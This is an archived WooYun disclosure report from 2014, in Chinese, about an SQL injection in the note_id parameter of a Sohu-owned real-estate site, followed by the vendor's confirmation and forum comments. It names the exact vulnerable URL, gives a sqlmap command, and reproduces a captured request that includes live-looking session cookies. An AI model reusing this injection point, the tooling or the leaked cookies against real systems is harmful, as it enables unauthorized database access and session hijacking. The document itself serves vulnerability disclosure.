搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

2015年5月3日06:42:49评论386 views字数 216阅读0分43秒阅读模式

摘要

2014-07-21：细节已通知厂商并且等待厂商处理中
2014-07-21：厂商已经确认，细节仅向厂商公开
2014-07-31：细节向核心白帽子及相关领域专家公开
2014-08-10：细节向普通白帽子公开
2014-08-20：细节向实习白帽子公开
2014-09-04：细节向公众公开

漏洞概要关注数(11) 关注此漏洞

缺陷编号： WooYun-2014-69204

漏洞标题：搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

漏洞作者：浩天

提交时间： 2014-07-21 16:14

公开时间： 2014-09-04 16:16

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql 注射技巧

3人收藏

漏洞详情

披露状态：

简要描述：

平台不太稳定，闲下来看了一眼，还能找到，不容吖

详细说明：

地址：http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393&note_id=369216

需要登录，注入点：note_id=

code 区域

sqlmap -r "d:/1.txt"

1.txt

code 区域

GET /zxrj/note_edit.php?note_id=369216&action=edit&this_login_id=46028393 HTTP/1.1
 Host: home.focus.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Cookie: ppinf=2|1405925995|1407135595|bG9naW5pZDowOnx1c2VyaWQ6MTg6Y2hhcmxlczJoQGZvY3VzLmNufHNlcnZpY2V1c2U6MzA6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwfGNydDoxMDoyMDExLTA4LTEyfGVtdDoxOjB8YXBwaWQ6NDoxMDI4fHRydXN0OjE6MXxwYXJ0bmVyaWQ6MTowfHJlbGF0aW9uOjA6fHV1aWQ6MTY6YjY5YzEwY2Y0ZDQ2NGJjZnx1aWQ6OTpmNDIwNjk2MzR8dW5pcW5hbWU6NDQ6JUU2JTkwJTlDJUU3JThCJTkwJUU3JUJEJTkxJUU1JThGJThCOTIxMDk5MzV8; pprdig=5CnWdje747Rq_ML1q8Gkl2fuxZyusOJCwy5nkBrnoRco_B4ZU3TTa0vmvZm1WdEk2OJrVV_nio3nRbKgCmPyvPQR7YgF4CGSwCRVOxvOINzHurj1D0nGvOiOgu5vYbsEq0SlpFa05FxOlnC1I28ql8G2U73iYAKTfcS2G6YmA-0; lastdomain=1407135595|Y2hhcmxlczJoQGZvY3VzLmNufA|focus.cn; ppmdig=14059259954851699cef15eb6cefce2955177e5f969d4cf2; house_session_id=ec07bfec1e2dadf4ab5478f5f98108b4bG9naW5faWQ9NDYwMjgzOTMmbG9naW5fbmFtZT1jaGFybGVzMmgmaGF1c3I9MCZzcHVpZD1jaGFybGVzMmhAZm9jdXMuY24%3D; PHPSESSID=2fu9t4ubhr5euqme6r8igop3j2; PHPSESSID=2fu9t4ubhr5euqme6r8igop3j2
 Connection: keep-alive

漏洞证明：

注入点是整型，貌似知道路径可以shell??

看看坑爹的搜索引擎

翻翻估计home的也能找到，就这样吧

修复方案：

上次收到4个小狐狸，很开心吖

还有么

版权声明：转载请注明来源浩天@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-21 16:32

厂商回复：

感谢对搜狐的支持

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-07-21 16:30 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

2

浩天叔啊，你说你最近天天带你进深山钓鱼。。你竟然不带我挖掘SOHO的洞。。哎呀。。无节操了。楼下注意队形。。。

1# 回复此人
2014-07-23 10:46 | 小杰哥 ( 普通白帽子 | Rank:251 漏洞数:35 | 我不是 T0n9 和的大号！)

1

浩天叔啊，你说你最近天天带你进深山钓鱼。。你竟然不带我挖掘SOHO的洞。。哎呀。。无节操了。楼下注意队形。。。

2# 回复此人
2014-07-23 11:22 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了，跪着也要...)

1

打错了。。是sohu哈哈

3# 回复此人
2014-08-20 17:03 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

1

sqlmap -r "d:/1.txt" http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393&note_id=369216那这个地址是放哪个位置就指导

4# 回复此人
2014-09-04 16:45 | 卡卡 ( 普通白帽子 | Rank:468 漏洞数:57 | <script>alert('安全团队长期招人')</scrip...)

1

浩天大哥上梁山带我当好汉

5# 回复此人
2014-09-04 18:51 | Moo ( 路人 | Rank:8 漏洞数:3 | PS：不打脸，还要泡妞呢)

1

@kydhzy GET /zxrj/note_edit.php?note_id=369216&action=edit&this_login_id=46028393 HTTP/1.1 Host: home.focus.cn

6# 回复此人

漏洞概要 关注数(11) 关注此漏洞

缺陷编号： WooYun-2014-69204

漏洞标题： 搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

相关厂商： 搜狐

漏洞作者： 浩天

提交时间： 2014-07-21 16:14

公开时间： 2014-09-04 16:16

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql 注射技巧

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 浩天@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(11) 关注此漏洞

漏洞标题：搜狐(第二季)旗下某站主域名sql注入第六集(越来越少吖)

相关厂商：搜狐

漏洞作者：浩天

危害等级：高

漏洞状态：厂商已经确认

版权声明：转载请注明来源浩天@乌云

漏洞评价(共0人评价):

登陆后才能进行评分